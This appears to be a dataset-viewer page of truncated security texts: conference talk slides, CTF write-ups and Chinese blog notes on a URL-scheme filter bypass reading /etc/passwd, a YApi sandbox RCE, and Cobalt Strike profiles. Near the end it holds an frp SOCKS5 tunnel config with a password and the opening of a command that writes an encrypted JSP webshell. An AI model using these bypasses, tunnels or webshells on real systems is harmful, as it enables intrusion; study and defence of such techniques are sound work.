昨天看到p
发出来的那个url:的scheme的⼩技巧感觉很有意思,就仔细看了⼀下。
⼤致如下:
意思是在url前加上前缀url:也可以正常执⾏,第⼀感觉应该是⽐如url:file:///etc/passwd可以拿来绕过startwith("file://")来请求file协议。
0x01 试⼀下
我不太懂java所以要试⼀下
正常请求百度,加了url:确实可以正常请求。试⼀下file
报错了,查了下,似乎是不允许把file协议丢给http handler来执⾏所以报错了。我不太清楚这是不是jdk1.8出来的问题。不过搜了⼀下改成下
⾯这样确实可以了
0x02 跟⼀下
简单跟⼀下... | pdf |
YApi 未授权用户创建&Mock远程命令执行漏洞
一、漏洞信息
监测到互联网上出现Yapi远程代码执行漏洞利用PoC,YApi 提供了编写JS 脚本方式来提供自定义mock
功能,JS脚本运行在NodeJs沙盒上,由于官方的沙盒只是为了隔离上下文,并不提供任何安全保证,攻
击者通过精心构造的Javascript代码可以绕过沙盒并用于执行任意系统命令,从而导致远程代码执行漏
洞,由于Yapi管理平台默认开放注册,攻击者可以注册任意用户进行漏洞利用;
建议受影响用户关闭用户注册进行防御,并删除用户列表中的不明用户,并等待官方补丁发布。
二、漏洞危害
YApi 提供了编写JS 脚本方式来提供自定义mock功能,JS脚本运行在NodeJs... | pdf |
pipestdin
0x00
0x01
0x02 1-writestdin
0x03 2-pipestdin
0x04
0x05 | pdf |
2005 Hex-Rays was founded
2015 ???
2007 Hex-Rays Decompiler 1.0
2009 Hex-Rays IDA 5.5
2013 Hex-Rays IDA 6.4
2011 Hex-Rays IDA 6.1
●
●
●
●
●
●
❏
❏
…
❏
❏
❏
❏
❏
❏
x = int(input())
if x >= 10:
if x < 100:
print "Two!"
else:
print "Lots!"
else:
print "One!"
x = int(input())
if x >= 10:
if x < 100:
print "Two!"
else:
print "... | pdf |
Jokes, vulnerabilities, and analysis of commit
statements
Logan Lodge and Bruce Potter
l0l0@shmoo.com gdead@shmoo.com
What’s the only thing you should believe?
Ever checked something in to your repository with
statements like “this need to be fixed” knowing
damn well you never will go back and fix it?
... | pdf |
The Future of Cybertravel:
Legal Implications
of the Evasion of Geolocation
Marketa Trimble
Marketa Trimble
What is this talk about?
What the law has (or does not have) to say about evasion
of geolocation or “cybertravel” – about acts by which a
user makes geolocation tools believe that he is physically
lo... | pdf |
Introduction
SEH Basics
Anti-RE Techniques
Decrypting the Content
Anti-RE Techniques in DRM Code
Jan Newger
Seminar on Advanced Exploitation Techniques
i4, RWTH Aachen, Germany
DEF CON 16 / 2008
Jan Newger
Anti-RE Techniques in DRM Code
Introduction
SEH Basics
Anti-RE Techniques
Decrypting the Content
Outline
1
Introdu... | pdf |
Interview with Joe McMoneagle on June 5, 2001
RT: The people I speak to seem to accept the extraterrestrial hypothesis as the least
unlikely, and when so many people of this caliber take it seriously, I am suggesting that
we should too ... how would you define your understanding of or relationship to UFO
phenomena?
JM:... | pdf |
Advanced Format String Attacks
Presented by Paul Haas
Contents
• Background
• Abstract
• Definition
• Context
• Technique
• How-to
• Tools
• Exploits
• Conclusion
• Q&A
Background
• Lead Web Application Security Engineer at
Redspin, Inc with over 4 years experience in
hundreds of audits.
• This talk is no... | pdf |
What are we talking about here?
Anti-hacking law
Communications law
Intellectual property
Criminal procedure
Computer Fraud and Abuse Act
(18 U.S.C. §1030)
This is the federal anti-hacking law.
Most states have something similar, too.
CFAA basic prohibitions
• Accessing a government computer without auth... | pdf |
LTE Recon and
Tracking with
RTLSDR
An SDR SIGINT Primer
Ian Kline
Wolf Den Associates
ian@wolfdenassociates.com
PGP Public Key
Lead: “Emissions Inspection”, Red Teams, Web App Pentests, Forensic
Analyst, Hacker for Hire
whoami
Why should you listen
Need a PoC quickly
- start with open source research
- integrate wit... | pdf |
使用CobaltStrike从学习C2profile开始
0x00 前言
我一直是CS的忠实粉丝,随着CS4.4的发布,增加了反射DLL的自定义功能,让CS越来越高度可定制化
了。完全没有必要因为防御方的各种查杀CS而放弃CS,转而选择其他C2,或者自己编写C2。当然我也
认可在一次高对抗的红队行动中,前锋马、潜伏马是必不可少的,多备几套C2方案也没有问题。
如果你在行动中,在流量层被查杀,那么你一定是没有用好C2profile。我不打算一一解释C2profile的参
数的意义,因为官方文档很详细了https://www.cobaltstrike.com/help-malleable-c2,也可以阅读http
s://github.... | pdf |
Penal Codes Relevant to Computer Crime in various
Countries
United States:
Sec. 33.01. DEFINITIONS. In this chapter:
(1) "Access" means to approach, instruct, communicate with, store data in, retrieve or
intercept data from, alter data or computer software in, or otherwise make use of any resource of a
comput... | pdf |
Breaking Google Home: Exploit It with
SQLite(Magellan)
Wenxiang Qian, Yuxiang Li, Huiyu Wu
Tencent Blade Team
About Us
Wenxiang Qian (@leonwxqian)
Senior security researcher at Tencent Blade Team. Focus on browser security & IoT security
Interested in code auditing. Security book author. Speaker of DEF CON 26, CSS 20... | pdf |
CTF WriteUp By Nu1L
Author:Nu1L
CTF WriteUp By Nu1L
WEB
carefuleyes
simpleflask
ezflask
sssrfme
babyshop
XWIKI
say hello to the world
PWN
vmpwn
sandbox
card
babyqemu
Reverse
PicCompress
Checkin
EasyRe
Simulator
WannaFlag
InfaintRe
Misc
signin
oldmodem
trihistory
crymisc
RIG
capture
v for Vendetta
GACTF FeedBack
Crypto
... | pdf |
Toxic Proxies - Bypassing HTTPS & VPNs to
pwn your online identity
Alex Chapman @noxrnet
Paul Stone @pdjstone
Introduction
Our Talk
Exciting introduction
Some history – SSL, PAC, WPAD, sslstrip, HSTS
The PAC Attack – bypassing HTTPS
– Sniffing your traffic
– Stealing your data
– Stealing your accounts
T... | pdf |
The spear to break the security wall of S7CommPlus
Cheng Lei, Li Donghong, Ma Liang
NS-Focus
Abstract. Siemens PLCs was widely used in industrial control system(ICS).
The new version of Siemens PLCs like S7-1500 and S7-1200v4.0 used an
encrypted protocol names S7CommPlus to prevent replay attacks. In this
paper, ... | pdf |
1
Humor – Your Adversaries
2
This is how your adversaries envision their DDoS attacks on your webserver:
Humor – Your Webserver
3
This is how your webserver will respond after implementing some of the
defensive strategies that this talk will cover:
Background
• Personal
– Blake currently works as a senior s... | pdf |
Understanding the Web browser threat:
Examination of vulnerable online Web browser
populations and the "insecurity iceberg"
Stefan Frei1, Thomas Duebendorfer2, Gunter Ollmann3, Martin May1
1 Communication Systems Group, ETH Zurich, Switzerland
2 Google Switzerland GmbH
3 IBM Internet Security Systems, USA
Contact: inse... | pdf |
Asleep at the Keyboard? Assessing the
Security of GitHub Copilot’s Code Contributions
Hammond Pearce
Department of ECE
New York University
Brooklyn, NY, USA
hammond.pearce@nyu.edu
Baleegh Ahmad
Department of ECE
New York University
Brooklyn, NY, USA
ba1283@nyu.edu
Benjamin Tan
Department of ESE
University of Calgary
Ca... | pdf |
*CTF WriteUp By Nu1L
Author: Nu1L
*CTF WriteUp By Nu1L
Pwn
examination
BabyNote
Ping
Reverse
Simple File System
NaCL
Jump
Misc
Alice's warm up
Today
BabyFL
Alice's challenge
checkin
Web
oh-my-grafana
oh-my-notepro
oh-my-lotto
oh-my-lotto-revenge
Crypto
ezRSA
InverseProblem2
Pwn
examination
from pwn import *
r = lambda ... | pdf |
Deceptive
Hacking
How misdirection
can be used to steal
information without
being detected
Bruce “Grymoire” Barnett
Magician & Computer Scientist
Magicians and hackers have a lot in
common
• They like to wear black
• They like to “shock” people
• They have Secret Knowledge
Assumptions
.umptions
Ass…
Mag... | pdf |
The Psychology of Security—DRAFT
June 28, 2007
Bruce Schneier
13544 words
Introduction
Security is both a feeling and a reality. And they’re not the same.
The reality of security is mathematical, based on the probability of different risks and the
effectiveness of different countermeasures. We can calculate ho... | pdf |
Mobile Privacy: Tor On The
iPhone And Other Unusual
Devices
Marco Bonetti - CutAway s.r.l.
whoami
Marco Bonetti
Security Consultant @ CutAway s.r.l.
mbonetti@cutaway.it
http://www.cutaway.it/
Tor user & researcher @ SLP-IT
http://sid77.slackware.it/
http://www.slackware.it/
http://twitter.com/_sid77/
Outline
Mobile P... | pdf |
[common]
bind_port = 9001
[common]
server_addr =
server_port = 9001
#Web
[socks5]
type = tcp
remote_port = 8088
plugin = socks5
use_encryption = true
use_compression = true
#socks5
plugin_user = test
plugin_passwd = pentest123
echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^>^<%!class U extend... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.